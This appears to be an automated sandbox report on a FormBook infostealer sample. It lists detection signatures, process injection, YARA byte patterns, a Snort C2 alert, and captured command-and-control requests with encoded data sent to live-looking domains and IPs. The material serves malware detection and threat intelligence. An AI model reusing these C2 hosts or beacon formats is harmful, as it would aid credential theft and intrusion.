Edit tour

Windows Analysis Report
PO0423023.exe

Overview

General Information

Sample name:	PO0423023.exe
Analysis ID:	1430158
MD5:	c7bebfd0af94c40da20ce3639251c688
SHA1:	bbe1339a4a15e7c7c9c0e68d2f3b8655c7c0780c
SHA256:	cc4eb6b1d8a54f9ad9c8483ba7ac4a141db452a40299719090ff7b1878047063
Tags:	exe
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected AntiVM3

Yara detected FormBook

.NET source code contains potential unpacker

.NET source code contains very large array initializations

Found direct / indirect Syscall (likely to bypass EDR)

Injects a PE file into a foreign processes

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Queues an APC in another process (thread injection)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

PO0423023.exe (PID: 3648 cmdline: "C:\Users\user\Desktop\PO0423023.exe" MD5: C7BEBFD0AF94C40DA20CE3639251C688)

PO0423023.exe (PID: 2428 cmdline: "C:\Users\user\Desktop\PO0423023.exe" MD5: C7BEBFD0AF94C40DA20CE3639251C688)

uFKwxSqRZbIimWVtjS.exe (PID: 5500 cmdline: "C:\Program Files (x86)\BfhsBJESSmvrxvvTUcmuRbsoDWHhTcMOtxhWkIEDZkirMcGdurpwUW\uFKwxSqRZbIimWVtjS.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

takeown.exe (PID: 6508 cmdline: "C:\Windows\SysWOW64\takeown.exe" MD5: A9AB2877AE82A53F5A387B045BF326A4)

uFKwxSqRZbIimWVtjS.exe (PID: 6976 cmdline: "C:\Program Files (x86)\BfhsBJESSmvrxvvTUcmuRbsoDWHhTcMOtxhWkIEDZkirMcGdurpwUW\uFKwxSqRZbIimWVtjS.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 6208 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/ https://asec.ahnlab.com/en/32149/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000008.00000002.3265262776.0000000005940000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000008.00000002.3265262776.0000000005940000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x57a3e:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x4106d:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000003.00000002.2489011998.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.2489011998.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2dd63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17392:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000006.00000002.3262815289.00000000038C0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.3262815289.00000000038C0000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a750:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000003.00000002.2491778083.0000000001CE0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.2491778083.0000000001CE0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a750:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000006.00000002.3262551392.00000000036A0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.3262551392.00000000036A0000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a750:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000006.00000002.3261184136.00000000032E0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.3261184136.00000000032E0000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a750:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000005.00000002.3262636915.0000000002A20000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.3262636915.0000000002A20000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x689ea4:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x6734d3:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000003.00000002.2491943456.0000000001DA0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.2491943456.0000000001DA0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x689ea4:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x6734d3:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Process Memory Space: PO0423023.exe PID: 3648	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 12 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
3.2.PO0423023.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
3.2.PO0423023.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2cf63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x16592:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
3.2.PO0423023.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
3.2.PO0423023.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2dd63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17392:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

Snort Signatures

ETPRO TROJAN FormBook CnC Checkin (POST) M4 - Source IP: 192.168.2.5 - Destination IP: 91.195.240.19

Timestamp:	04/23/24-08:38:47.457495
SID:	2856318
Source Port:	49721
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: PO0423023.exe	Virustotal: Detection: 35%			Perma Link
Source: PO0423023.exe	ReversingLabs: Detection: 31%

Yara detected FormBook

Source: Yara match	File source: 3.2.PO0423023.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.PO0423023.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.3265262776.0000000005940000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2489011998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3262815289.00000000038C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2491778083.0000000001CE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3262551392.00000000036A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3261184136.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3262636915.0000000002A20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2491943456.0000000001DA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Machine Learning detection for sample

Source: PO0423023.exe

Joe Sandbox ML: detected

Source: PO0423023.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: PO0423023.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: tLYg.pdb source: PO0423023.exe
Source:	Binary string: takeown.pdbGCTL source: PO0423023.exe, 00000003.00000002.2489347958.0000000001538000.00000004.00000020.00020000.00000000.sdmp, uFKwxSqRZbIimWVtjS.exe, 00000005.00000002.3262104447.0000000000E88000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: uFKwxSqRZbIimWVtjS.exe, 00000005.00000000.2409064441.000000000009E000.00000002.00000001.01000000.0000000D.sdmp, uFKwxSqRZbIimWVtjS.exe, 00000008.00000000.2565630013.000000000009E000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: wntdll.pdbUGP source: PO0423023.exe, 00000003.00000002.2489820971.0000000001990000.00000040.00001000.00020000.00000000.sdmp, takeown.exe, 00000006.00000002.3262997035.0000000003C0E000.00000040.00001000.00020000.00000000.sdmp, takeown.exe, 00000006.00000003.2489739936.0000000003718000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 00000006.00000002.3262997035.0000000003A70000.00000040.00001000.00020000.00000000.sdmp, takeown.exe, 00000006.00000003.2492243743.00000000038C1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: takeown.pdb source: PO0423023.exe, 00000003.00000002.2489347958.0000000001538000.00000004.00000020.00020000.00000000.sdmp, uFKwxSqRZbIimWVtjS.exe, 00000005.00000002.3262104447.0000000000E88000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: tLYg.pdbSHA256 source: PO0423023.exe
Source:	Binary string: wntdll.pdb source: PO0423023.exe, PO0423023.exe, 00000003.00000002.2489820971.0000000001990000.00000040.00001000.00020000.00000000.sdmp, takeown.exe, takeown.exe, 00000006.00000002.3262997035.0000000003C0E000.00000040.00001000.00020000.00000000.sdmp, takeown.exe, 00000006.00000003.2489739936.0000000003718000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 00000006.00000002.3262997035.0000000003A70000.00000040.00001000.00020000.00000000.sdmp, takeown.exe, 00000006.00000003.2492243743.00000000038C1000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Windows\SysWOW64\takeown.exe

Code function: 6_2_032FBAC0 FindFirstFileW,FindNextFileW,FindClose,

6_2_032FBAC0

Source: C:\Windows\SysWOW64\takeown.exe	Code function: 4x nop then xor eax, eax	6_2_032E9290
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 4x nop then pop edi	6_2_032F1FFB
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 4x nop then pop edi	6_2_032EDD18

Networking

Snort IDS alert for network traffic

Source: Traffic

Snort IDS: 2856318 ETPRO TROJAN FormBook CnC Checkin (POST) M4 192.168.2.5:49721 -> 91.195.240.19:80

Source: Joe Sandbox View	IP Address: 91.195.240.117 91.195.240.117
Source: Joe Sandbox View	IP Address: 91.195.240.123 91.195.240.123
Source: Joe Sandbox View	IP Address: 91.195.240.19 91.195.240.19

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /pq0o/?Lx=8PqlJ028VT_&sHlxgpX=J8WC84xruYdLZ+88O/faPZDbDvgvpAFcdnGo6AhEflv3qioXWy6Vm5wGjKWjZFBj5bzfVwWaJCB72b3lEpkTVQZSX1dtpaRBnFtuiUAedf4oW0TmsJoC9BTZIWyKDmIsTQ== HTTP/1.1Host: www.xn--yzyp76d.comAccept: /Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) LinkCheck by Siteimprove.com
Source: global traffic	HTTP traffic detected: GET /pq0o/?sHlxgpX=zlo+FGSBhCkM5GVOiSRgbmytEbX4vu088Yj7BD8zO0hDA+Ttp+tE7JQXtFhQSzjU/FmrV36xGrNmbpUbkD9mJUabQMjhSVlFurdcd91J2fhXl/3bZKBIsDf+Ls10KGv+Sw==&Lx=8PqlJ028VT_ HTTP/1.1Host: www.luckydomainz.shopAccept: /Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) LinkCheck by Siteimprove.com
Source: global traffic	HTTP traffic detected: GET /pq0o/?Lx=8PqlJ028VT_&sHlxgpX=zdIBKqN9oP3plxVX8thCZZdmDrHBie+/57+iRklTGjPKULzejm8MTR3zmbqN1d/mp0y1+1mzyQU/+H24oE5uBlYVorRh6rpQbOSJYQm+mXyPaQohcHNhiXaWLX+2tNk6Xw== HTTP/1.1Host: www.cd14j.usAccept: /Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) LinkCheck by Siteimprove.com
Source: global traffic	HTTP traffic detected: GET /pq0o/?sHlxgpX=Ed/ELXNC0S7dMHCut27L778qDXjqsr17l3BGGyc+QR+QSIsAiYGE9ikEmCd6tM+iTSJXxriNtRC8Y/iBHpE37xqgjcRlXnwEl/GWP1Z5DHGRU92yhpKCU6gPuWpCXnwQNw==&Lx=8PqlJ028VT_ HTTP/1.1Host: www.fashionagencylab.comAccept: /Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) LinkCheck by Siteimprove.com

Source: unknown

DNS traffic detected: queries for: www.xn--yzyp76d.com

Source: unknown

HTTP traffic detected: POST /pq0o/ HTTP/1.1Host: www.luckydomainz.shopAccept: */*Accept-Language: en-usAccept-Encoding: gzip, deflateOrigin: http://www.luckydomainz.shopContent-Length: 208Connection: closeContent-Type: application/x-www-form-urlencodedCache-Control: max-age=0Referer: http://www.luckydomainz.shop/pq0o/User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) LinkCheck by Siteimprove.comData Raw: 73 48 6c 78 67 70 58 3d 2b 6e 41 65 47 7a 57 59 75 77 46 2f 37 67 35 74 74 43 52 6a 56 47 79 7a 44 62 48 34 68 5a 45 42 31 75 76 37 4b 46 38 77 45 48 77 49 41 72 6a 4f 6b 2b 34 69 2f 49 77 6f 39 46 56 44 65 30 37 51 2b 32 7a 70 63 6c 43 64 43 4a 74 46 57 37 6f 37 75 43 42 2f 4e 46 43 53 56 35 44 77 62 31 78 53 78 4c 56 65 52 65 4d 5a 30 64 41 79 32 5a 4f 51 51 4d 46 4b 73 68 6e 69 64 4d 78 6e 66 48 4b 78 50 64 49 4f 6b 47 30 4e 74 32 2f 6c 30 59 63 2f 59 38 4e 4f 4b 6e 49 46 61 51 51 38 2f 5a 71 42 35 72 63 6d 6b 32 6e 4c 42 6a 46 63 39 44 52 6f 38 6d 31 47 34 78 7a 45 64 4a 71 58 5a 70 5a 5a 69 6f 4a 6a 38 34 38 3d Data Ascii: sHlxgpX=+nAeGzWYuwF/7g5ttCRjVGyzDbH4hZEB1uv7KF8wEHwIArjOk+4i/Iwo9FVDe07Q+2zpclCdCJtFW7o7uCB/NFCSV5Dwb1xSxLVeReMZ0dAy2ZOQQMFKshnidMxnfHKxPdIOkG0Nt2/l0Yc/Y8NOKnIFaQQ8/ZqB5rcmk2nLBjFc9DRo8m1G4xzEdJqXZpZZioJj848=

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 23 Apr 2024 06:38:26 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingData Raw: 64 34 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 3c 74 69 74 6c 65 3e e9 95 bf e7 9b 9b 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 61 72 6b 73 6d 69 6c 65 2e 63 6f 6d 2f 61 73 73 65 74 2f 6c 70 5f 73 74 79 6c 65 2e 63 73 73 22 20 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 61 69 6c 2e 33 36 35 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 68 74 6d 6c 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 66 69 6c 65 2f 6d 61 69 6c 2e 70 6e 67 22 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 68 65 69 67 68 74 3d 22 61 75 74 6f 22 20 61 6c 74 3d 22 33 36 35 e9 82 ae e7 ae b1 22 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 3b 6c 65 66 74 3a 30 3b 7a 2d 69 6e 64 65 78 3a 20 31 3b 22 3e 3c 2f 61 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6d 22 20 3e 3c 68 32 20 69 64 3d 22 64 6f 6d 61 69 6e 22 3e e9 95 bf e7 9b 9b 2e 63 6f 6d 3c 2f 68 32 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 67 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 22 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 22 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 22 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 22 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 2f 2f 63 6f 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 22 3e 0a 3c 74 61 62 6c 65 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 20 62 6f 72 64 65 72 3d 22 30 22 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 22 30 22 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 22 30 22 3e 0a 3c 74 72 3e 3c 74 64 20 61 6c 69 67 6e 3d 22 6c 65 66 74 22 3e e5 9f 9f e5 90 8d e6 89 98 e7 ae a1 e5 95 86 3a 3c 69 6d 67 20 73 72 63 3d 22 66 69 6c 65 2f 6d 61 72

Source: PO0423023.exe	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: PO0423023.exe	String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: PO0423023.exe	String found in binary or memory: http://ocsp.comodoca.com0
Source: PO0423023.exe	String found in binary or memory: http://tempuri.org/DataSet1.xsd
Source: uFKwxSqRZbIimWVtjS.exe, 00000008.00000002.3265262776.00000000059B8000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.fashionagencylab.com
Source: uFKwxSqRZbIimWVtjS.exe, 00000008.00000002.3265262776.00000000059B8000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.fashionagencylab.com/pq0o/
Source: takeown.exe, 00000006.00000002.3263652548.00000000044C4000.00000004.10000000.00040000.00000000.sdmp, uFKwxSqRZbIimWVtjS.exe, 00000008.00000002.3263133783.00000000038F4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2804163567.000000002EEC4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.marksmile.com/asset/lp_qrcode.png
Source: takeown.exe, 00000006.00000002.3263652548.00000000044C4000.00000004.10000000.00040000.00000000.sdmp, uFKwxSqRZbIimWVtjS.exe, 00000008.00000002.3263133783.00000000038F4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2804163567.000000002EEC4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.marksmile.com/asset/lp_style.css
Source: takeown.exe, 00000006.00000002.3266159906.0000000008358000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: takeown.exe, 00000006.00000002.3266159906.0000000008358000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: takeown.exe, 00000006.00000002.3266159906.0000000008358000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: takeown.exe, 00000006.00000002.3266159906.0000000008358000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: takeown.exe, 00000006.00000002.3266159906.0000000008358000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: takeown.exe, 00000006.00000002.3266159906.0000000008358000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: takeown.exe, 00000006.00000002.3266159906.0000000008358000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: takeown.exe, 00000006.00000002.3263652548.0000000004656000.00000004.10000000.00040000.00000000.sdmp, uFKwxSqRZbIimWVtjS.exe, 00000008.00000002.3263133783.0000000003A86000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://img.sedoparking.com/templates/images/hero_nc.svg
Source: takeown.exe, 00000006.00000002.3263652548.00000000044C4000.00000004.10000000.00040000.00000000.sdmp, uFKwxSqRZbIimWVtjS.exe, 00000008.00000002.3263133783.00000000038F4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2804163567.000000002EEC4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://lf6-cdn-tos.bytecdntp.com/cdn/expire-1-M/axios/0.26.0/axios.min.js
Source: takeown.exe, 00000006.00000002.3261394399.00000000035DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: takeown.exe, 00000006.00000002.3261394399.00000000035EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: takeown.exe, 00000006.00000002.3261394399.00000000035DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf
Source: takeown.exe, 00000006.00000002.3261394399.00000000035BE000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 00000006.00000002.3261394399.00000000035DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
Source: takeown.exe, 00000006.00000002.3261394399.00000000035BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2YY
Source: takeown.exe, 00000006.00000002.3261394399.00000000035DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: takeown.exe, 00000006.00000002.3261394399.00000000035DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033&9
Source: takeown.exe, 00000006.00000002.3261394399.00000000035DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: takeown.exe, 00000006.00000002.3261394399.00000000035DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: takeown.exe, 00000006.00000003.2677821790.000000000827D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: takeown.exe, 00000006.00000002.3263652548.00000000044C4000.00000004.10000000.00040000.00000000.sdmp, uFKwxSqRZbIimWVtjS.exe, 00000008.00000002.3263133783.00000000038F4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2804163567.000000002EEC4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://mail.365.com/login.html
Source: PO0423023.exe	String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
Source: takeown.exe, 00000006.00000002.3266159906.0000000008358000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: takeown.exe, 00000006.00000002.3263652548.00000000044C4000.00000004.10000000.00040000.00000000.sdmp, uFKwxSqRZbIimWVtjS.exe, 00000008.00000002.3263133783.00000000038F4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2804163567.000000002EEC4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.marksmile.com/
